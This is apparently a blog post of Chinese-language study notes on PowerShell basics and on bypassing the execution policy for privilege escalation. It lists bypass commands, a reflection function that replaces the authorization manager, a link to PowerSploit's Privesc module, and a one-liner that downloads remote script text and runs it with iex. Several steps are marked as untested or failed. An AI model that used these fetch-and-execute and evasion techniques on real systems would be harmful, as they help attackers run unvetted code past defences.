1 介绍
Windows PowerShell 是一种命令行外壳程序的脚本环境,它内置在每个受支持的Windows版中(Windows7、Windows Server2008 R2及更高版本),为windows命令行使用者和脚本编写者利用.NET Framework的强大功能提供了遍历。
需要.NET环境支持
1.1 特点
- win7以上默认安装
- 脚本可以在内存中运行,不需要写入磁盘
- 几乎不会出发杀软
- 可以远程执行
- 是windows脚本执行更容易
- cmd.exe的运行通常会被阻止,但是PowerShell不会被阻止
- 可用于管理活动目录
1.2 基本概念
1.2.1 .ps1 文件
一个PowerShell脚本其实就是一个简单的文本文件,其扩展名为".ps1"。PowerShell脚本文件中包含一系列命令,每个命令为独立一行。
1.2.2 执行策略
为防止恶意脚本,默认情况下策略为“不能执行”
若无法运行,可使用cmdlet查询当前执行策略
get-executionPolicy
Restricted:脚本不能运行(默认设置)
RemoteSigned:在本地创建脚本可以运行,但从网上下载的不能(拥有数字证书签名除外)
AllSigned:仅当脚本受信任的发布者签名时才能运行
Urestricted:允许所有脚本运行
可以使用cmdlet命令设置PowerShell的执行策略
set-ExcutionPolicy <policy name>
1.2.3 运行脚本
必须输入完整路径和问价名,如:
C:\Scripts\a.ps1
1.2.4 管道
作用:将一个命令的输出作为另一个命令的输入,两个命令用 | 连接
get-process p* | stop-process
一个神奇的命令
2 常用命令
2.1 帮助
help
2.2 查看PowerShell版本
get-host
$PSVersionTable.PSVERSION
2.3 启动
powershell
也可以从cmd输入命令切入
2.4 获取命令
命令很多
2.5 获取所有进程
get-process
2.6 指定命令重命名
set-alias aaa get-command
2.7 清屏
cls
clear
3 PowerShell提权
要想运行PowerShell脚本程序,必须使用管理员权限将策略从Restricted改为Unrestricted。
PowerUp.ps1文件可从这里下载
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
3.1 绕过本地权限并执行
runme.ps1
Write-Host "My voice is my passport, verify me."
3.1.1 获取当前策略
Get-ExecutionPolicy
同样可以将之心执行策略设置为不同级别。
3.1.2 查看支持的所有级别
linux 基本命令也可以用
Set-ExecutionPolicy
Get-ExecutionPolicy -List | Format-Table -Autoize
如果策略很开放,想使用更严格的方式来测试如下方案,需切换到管理员身份,执行
Set-ExecutionPolicy Restricted
3.2 绕过方式
3.2.1 在交互式PowerShell窗口运行
3.2.2 Echo脚本 Pipe到PowerShell的标准输入
引号内如果是中文会报错,未知
3.2.3 从文件读入脚本 Pipe到PowerShell的标准输入
Get-Content ./runme.ps1 | PowerShell.exe -noprofile -
Type ./runme.ps1 | PowerShell.exe -noprofile -
3.2.4 从一个URL Dowload脚本内容,然后执行
PowerShell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://10.12.120.66:8888/runme.ps1')"这里一直没测试成功
3.2.5 使用 -command 命令参数
此方法和直接粘贴脚本内容的方式很像,但是此方法不需要一个交互式窗口。它适用于简单脚本执行,对于复杂脚本会发生解析错误。该方法同样不会写内容到磁盘中。
PowerShell -command "Write-Host 'you are good.'"
可以将该命令写到一个bat文件中,然后放到启动目录中,来帮助提权
3.2.6 使用 -encodedCommand命令参数
此方法很上一个方法很相似,但是此方式脚本内容是 Unicode/base64 encod字符串。
使用编码的好处是可以让你避免执行使用Command参数时产生一些糟糕的解析问题
3.2.7 Invoke-Command 命令
该方法最好的在对对抗PowerShell remoting开启的Remote系统
invoke-command -scriptblock {Write-Host "You are good."}
如下命令可以来从一个远程系统上抓区执行策略,同时运用到本地计算机中
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force3.2.8 使用Invoke-Expression命令
Get-Content ./runme.ps1 | Invoke-Expression
gc ./runme.ps1 | iex
测试均未生效
3.2.9 使用Bypass执行策略标志
这个方法时微软提供的用来绕过执行策略的一种方式。当指定白标志后,即视为什么都不做,什么警告都不提示
PowerShell -ExecutionPolicy bypass -File ./runme.ps1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IOnKv7Jv-1630949007798)(Windows PowerShell使用Bypass执行策略标志.png)]
3.2.10 使用Unrestricted执行策略标志
该标志和bypass很像,但是当使用该标志时,意味着加载所有的配置文件和执行所有的脚本
PowerShell -ExecutionPolicy unrestricted -File ./runme.ps1
3.2.11 使用Remote-Signed执行策略标志
创建脚本,然后按签名指南,最后运行
签名指南:https://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
PowerShell.exe -ExecutionPolicy Remote-signed -File ./runme.ps1
未测试成功
3.2.12 通过换出认证管理器,禁用执行策略
如果函数可以在交互式窗口中使用,也可以在Command参数中指定。
一旦该函数被执行,则会认证管理器,同时默认策略改为unrestricted。
该方法只在一个会话范围内有效。
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} Disable-ExecutionPolicy ./runme.ps1disable-ExecutionPolicy
./runme.ps1
3.2.13 设置执行策略为Process作用域
执行策略可以应用到各个级别,其中包括完全控制process。使用该方法仅限于session中,执行策略会变为unrestricted
Set-ExecutionPolicy Bypass -Scope Process
3.2.14 通过命令设置执行策略为CurrentUser作用域
Set-ExecutionPolicy -Scopr CurrentUser ExecutionPolucy UnRestricted
命令报错
3.2.15 通过注册表设置执行策略为CurrentUser作用域
HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
regedit
